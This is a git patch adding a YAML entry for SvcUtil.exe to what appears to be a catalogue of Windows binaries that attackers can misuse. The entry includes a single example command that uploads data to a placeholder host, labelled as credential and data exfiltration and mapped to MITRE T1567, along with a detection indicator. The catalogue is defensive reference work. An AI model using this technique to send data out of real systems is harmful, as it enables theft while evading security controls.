From 8533a8c90d7e6da855a3ae9ef1cf590914b3ca78 Mon Sep 17 00:00:00 2001
From: Avihay Eldad <46644022+avihayeldad@users.noreply.github.com>
Date: Thu, 25 Apr 2024 14:22:12 +0300
Subject: [PATCH] Add SvcUtil.yml

---
 yml/OtherMSBinaries/SvcUtil.yml | 22 ++++++++++++++++++++++
 1 file changed, 22 insertions(+)
 create mode 100644 yml/OtherMSBinaries/SvcUtil.yml

diff --git a/yml/OtherMSBinaries/SvcUtil.yml b/yml/OtherMSBinaries/SvcUtil.yml
new file mode 100644
index 000000000..0ac6bea43
--- /dev/null
+++ b/yml/OtherMSBinaries/SvcUtil.yml
@@ -0,0 +1,22 @@
+---
+Name: SvcUtil.exe
+Description: ServiceModel Metadata Utility Tool included with the Microsoft Windows SDK
+Author: Avihay Eldad
+Created: 2024-04-25
+Commands:
+  - Command: SvcUtil.exe http://example.com/ExfilData
+    Description: Upload file, credentials or data exfiltration in general
+    Usecase: Exfilitrate data to remote server
+    Category: Upload
+    Privileges: User
+    MitreID: T1567
+    OperatingSystem: Windows
+Full_Path:
+  - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\{version}\bin\NETFX {version} Tools\SvcUtil.exe
+Detection:
+  - IOC: SvcUtil making unexpected network connections or DNS requests
+Acknowledgement:
+  - Person: Avihay Eldad
+    Handle: '@AvihayEldad'
+  - Person: Yuval Saban
+    Handle: '@yuvalsaban3'